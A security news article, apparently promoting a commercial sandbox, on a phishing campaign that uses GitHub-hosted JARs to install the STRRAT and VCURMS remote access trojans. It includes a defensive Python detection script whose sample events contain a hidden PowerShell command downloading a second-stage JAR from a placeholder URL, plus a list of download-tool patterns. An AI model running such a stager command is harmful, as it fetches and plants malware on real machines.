
Hackers Deploy STRRAT & VCURMS Malware on Windows Via GitHub

A new phishing campaign targets users with emails containing a button to “verify payment information.” Clicking the button triggers the download of a malicious JAR file (disguised as an invoice) that leverages a PowerShell command to download two additional JARs. 

The JARs deploy the STRRAT and VCURMS RATs, granting attackers remote access, keylogging, and credential theft from browsers, applications, Discord, Steam, and other software. In addition, VCURMS can download further modules to expand its information-stealing functionality.

The attackers use AWS or GitHub to host the malware, obfuscate the initial JAR file, and employ a commercial protector to evade detection.

Finding the attack in ANY.RUN’s Threat Intelligence Lookup

The Threat Intelligence Lookup feature of ANY.RUN allows you to investigate suspicious campaigns.

ANY.RUN Threat Intelligence Lookup portal

By crafting a query that combines specific rule names and domain names (e.g., `RuleName:"strrat" AND DomainName:"github.com"`), analysts can identify relevant sandbox sessions where the suspicious behavior (STRRAT) was observed interacting with a particular domain (github.com).

A query to find IOCs and events connected to STRRAT malware

The lookup presents two key results: a table with interactive analysis sessions (left side) that can be used to examine malware behavior in a safe environment and a list of malicious executables (right side) downloadable for further analysis or to check logs for potential compromises.

To learn more about the sample's behavior and extract additional IOCs, let's replay a recorded online analysis session. To follow along, you can simply open the session yourself.

Analyzing the attack in ANY.RUN’s Sandbox

ANY.RUN is a cloud-based sandbox environment for analyzing suspicious files. It utilizes YARA and Suricata rules to detect malware within 40 seconds of uploading. 

Main view in the ANY.RUN interactive sandbox. Note the tags in the upper-right corner.

Analysts can then directly interact with the sandboxed environment to observe malware behavior and collect indicators of compromise (IOCs), empowering security teams to collaboratively investigate threats and efficiently respond to emerging and persistent attacks. 

The analysis begins by examining the tags in the ANY.RUN sandbox, which reveal the presence of STRRAT malware.

The Connections tab is then used to identify a connection from javaw.exe to GitHub, potentially linking the sample to a broader campaign.
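The two behaviours described above (a Java process spawning PowerShell to fetch a second-stage JAR, and javaw.exe reaching out to GitHub or AWS) are the kind of chain a defender can hunt for in endpoint telemetry. The following detection logic is an added example, not part of the original article or ANY.RUN's tooling; the Sysmon-style field names and the sample events are constructed for illustration.

```python
"""Flag the JAR -> PowerShell -> second-stage JAR chain and Java-to-GitHub/AWS
connections. Constructed Sysmon-style events; field names are assumptions."""
import re
from typing import Iterable

JAVA_HOSTS = {"java.exe", "javaw.exe"}
# PowerShell download primitives commonly seen in one-line stagers
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
JAR_RE = re.compile(r"\.jar\b", re.IGNORECASE)
HOSTING_DOMAINS = ("github.com", "githubusercontent.com", "amazonaws.com")


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_hosting_domain(host: str) -> bool:
    """Exact or subdomain match, so 'evilgithub.com' does not match."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in HOSTING_DOMAINS)


def detect(events: Iterable[dict]) -> list[str]:
    """Return one human-readable finding per suspicious event."""
    findings = []
    for ev in events:
        if ev.get("type") == "process_create":
            parent = image_name(ev.get("parent_image", ""))
            child = image_name(ev.get("image", ""))
            cmd = ev.get("command_line", "")
            if parent in JAVA_HOSTS and child == "powershell.exe" and DOWNLOAD_RE.search(cmd):
                stage = "second-stage JAR" if JAR_RE.search(cmd) else "payload"
                findings.append(f"pid {ev['pid']}: {parent} spawned powershell.exe downloading a {stage}")
        elif ev.get("type") == "network_connect":
            proc = image_name(ev.get("image", ""))
            if proc in JAVA_HOSTS and is_hosting_domain(ev.get("dest_host", "")):
                findings.append(f"pid {ev['pid']}: {proc} connected to {ev['dest_host'].lower()}")
    return findings


# Constructed sample events: a benign Java build, then the campaign-style chain.
# The URL is a placeholder, not a real indicator from the article.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 1201, "parent_image": r"C:\Program Files\Java\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd /c gradlew build"},
    {"type": "process_create", "pid": 4412, "parent_image": r"C:\Program Files\Java\bin\javaw.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://github.com/EXAMPLE/stage2.jar -OutFile $env:TEMP\\s2.jar"'},
    {"type": "network_connect", "pid": 4412, "image": r"C:\Program Files\Java\bin\javaw.exe", "dest_host": "github.com"},
    {"type": "network_connect", "pid": 7, "image": r"C:\Windows\explorer.exe", "dest_host": "github.com"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Legitimate developer tooling also runs Java and talks to GitHub, so in production these findings should be correlated (same pid or short time window) rather than alerted on individually.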

Indicators of Compromise

To collect IOCs, the user utilizes the dedicated IOC button within ANY.RUN, providing valuable information for security teams to update their systems and continue their investigation.

The session highlights ANY.RUN's ability to extract malware configuration, automatically decrypt embedded strings, and reveal details such as persistence mechanisms and Command & Control (C2) server locations, which saves analysts significant time and effort compared to manual reverse engineering.

Get a personalized demo of ANY.RUN for your team to see how it can benefit and contribute to your organization’s security – Schedule a call today.

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
